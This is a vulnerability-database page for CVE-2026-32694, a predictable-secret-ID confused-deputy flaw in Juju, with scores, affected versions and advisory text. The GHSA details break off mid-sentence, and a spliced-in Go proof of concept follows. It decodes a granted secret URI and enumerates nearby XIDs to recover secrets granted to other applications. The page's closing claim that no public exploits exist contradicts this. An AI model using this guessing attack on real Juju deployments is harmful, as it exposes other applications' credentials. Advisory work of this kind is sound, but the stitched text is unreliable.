CVE-2026-32694
Published 2026-03-18
Priority: P3 · 37 · Severity: medium
CVSS 3.1 base score: 6.6, vector CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.27% (18.4th percentile)
In Juju from version 3.0.0 through 3.6.18, when a secret owner grants permissions on a secret to a grantee, the secret owner relies exclusively on the predictable XID of the secret to verify ownership. This allows a malicious grantee that can request secrets to predict past secrets granted by the same secret owner to different grantees, and so to use the resources granted by those past secrets. Successful exploitation relies on a very specific configuration, specific data semantics, and the administrator needing to deploy at least two different applications, one of them controlled by the attacker.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | juju | >= 3.0.0 < 3.6.19 | 3.6.19 |
| github.com | juju_juju | >= 0.0.0-20221021155847-35c560704ee2 < 0.0.0-20260319091847-d06919eb03ec | 0.0.0-20260319091847-d06919eb03ec |
OSV
osv · 2026-03-23
CVE-2026-32694: Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets in github.com/juju/juju
GHSA
ghsa · 2026-03-19
CVE-2026-32694 [MEDIUM] CWE-343 (Predictable Value Range from Previous Values): Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets
### Summary
Predictable secret ID and lack of secret origin API enable confused deputy attacks on Juju workloads.
### Details
A Juju application can create a secret and grant it to another integrated application (the grantee).
When it does so, the secret owner has to communicate the secret ID to the grantee.
The grantee, having received the secret ID, can load the secret content and perform operations on behalf of the secret owner.
However, today the grantee has no way to determine which granted secret belongs to which owner.
Instead the grantee relies on:
- being able to read the secret by ID (the secret was in fact granted, by some entity)
- the secret ID having been received over a relation (the remote end
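The predictability the advisory builds on, as an added example that is not Juju's code or the advisory's own: this Go program assumes a Juju secret URI is `secret:` followed by a github.com/rs/xid value, and reimplements that library's documented 12-byte layout (4-byte Unix timestamp, 3-byte machine id, 2-byte process id, 3-byte counter with a random start, base32hex text) with the standard library. The `Minter`, the app names and the timestamps are constructed for the demo. Given only the ID it was legitimately granted, the attacker-controlled grantee fixes the machine and pid fields and enumerates the few counter and timestamp values that could have preceded it, which is enough to recover the URIs handed to the other grantees.

```go
package main

import (
	"encoding/base32"
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

// Assumption: a secret URI is "secret:" plus a 20-character xid.
const secretPrefix = "secret:"

// rs/xid text form: base32hex alphabet, no padding, lowercase.
var xidText = base32.HexEncoding.WithPadding(base32.NoPadding)

// XID is the 12-byte layout documented for github.com/rs/xid.
type XID struct {
	Time    uint32  // seconds since the Unix epoch, big endian
	Machine [3]byte // machine identifier
	PID     uint16  // process id of the minting process
	Counter uint32  // 24-bit counter: random start, +1 per id minted by that process
}

// ParseSecretURI decodes a secret URI into its xid fields.
func ParseSecretURI(uri string) (XID, error) {
	if !strings.HasPrefix(uri, secretPrefix) || len(uri) != len(secretPrefix)+20 {
		return XID{}, errors.New("not a secret:<xid> URI")
	}
	b, err := xidText.DecodeString(strings.ToUpper(uri[len(secretPrefix):]))
	if err != nil || len(b) != 12 {
		return XID{}, fmt.Errorf("bad xid in %q: %v", uri, err)
	}
	var x XID
	x.Time = binary.BigEndian.Uint32(b[0:4])
	copy(x.Machine[:], b[4:7])
	x.PID = binary.BigEndian.Uint16(b[7:9])
	x.Counter = uint32(b[9])<<16 | uint32(b[10])<<8 | uint32(b[11])
	return x, nil
}

// SecretURI re-encodes the fields into a secret URI.
func (x XID) SecretURI() string {
	var b [12]byte
	binary.BigEndian.PutUint32(b[0:4], x.Time)
	copy(b[4:7], x.Machine[:])
	binary.BigEndian.PutUint16(b[7:9], x.PID)
	b[9], b[10], b[11] = byte(x.Counter>>16), byte(x.Counter>>8), byte(x.Counter)
	return secretPrefix + strings.ToLower(xidText.EncodeToString(b[:]))
}

// CandidateIDs enumerates URIs of secrets minted shortly before `known` by the same
// process: machine and pid are kept, the counter is 1..counterBack lower and the
// timestamp 0..secondsBack earlier. This is the attacker's whole search space.
func CandidateIDs(known XID, counterBack, secondsBack uint32) []string {
	out := make([]string, 0, counterBack*(secondsBack+1))
	for dc := uint32(1); dc <= counterBack; dc++ {
		for dt := uint32(0); dt <= secondsBack; dt++ {
			c := known
			c.Counter = (known.Counter - dc) & 0xFFFFFF // 24-bit wraparound
			c.Time = known.Time - dt
			out = append(out, c.SecretURI())
		}
	}
	return out
}

// Minter stands in for the per-process state rs/xid keeps (constructed values).
type Minter struct {
	Machine [3]byte
	PID     uint16
	Counter uint32
}

// Mint returns the next id for creation time `now`, incrementing the counter.
func (m *Minter) Mint(now uint32) XID {
	x := XID{Time: now, Machine: m.Machine, PID: m.PID, Counter: m.Counter & 0xFFFFFF}
	m.Counter = (m.Counter + 1) & 0xFFFFFF
	return x
}

// Demo plays the advisory's scenario on constructed data: one owner process mints
// secrets for two honest grantees, then one for an attacker-controlled app. The
// attacker only receives its own URI and recovers the earlier ones by guessing.
func Demo() (attackerURI string, recovered []string) {
	owner := &Minter{Machine: [3]byte{0x0a, 0x1b, 0x2c}, PID: 4242, Counter: 0x7f0000}
	dbURI := owner.Mint(1_700_000_000).SecretURI()      // granted to app "db"
	cacheURI := owner.Mint(1_700_000_003).SecretURI()   // granted to app "cache"
	attackerURI = owner.Mint(1_700_000_010).SecretURI() // granted to the attacker's app

	known, err := ParseSecretURI(attackerURI)
	if err != nil {
		panic(err)
	}
	guessed := make(map[string]bool)
	for _, g := range CandidateIDs(known, 8, 15) { // 128 guesses in total
		guessed[g] = true
	}
	for _, victim := range []string{dbURI, cacheURI} {
		if guessed[victim] {
			recovered = append(recovered, victim)
		}
	}
	return attackerURI, recovered
}

func main() {
	uri, recovered := Demo()
	fmt.Println("attacker was granted:", uri)
	for _, r := range recovered {
		fmt.Println("earlier secret recoverable by guessing:", r)
	}
}
```

Every recovered URI passes the first check the grantee relies on (it is readable, because it really was granted to somebody), so a grantee that accepts any readable ID will act on it; the missing origin check the summary mentions, which secret belongs to which owner, is what would let the grantee reject it.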
OSV
osv · 2026-03-19
CVE-2026-32694 [MEDIUM]: Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets
No detection rules found.
No public exploits indexed.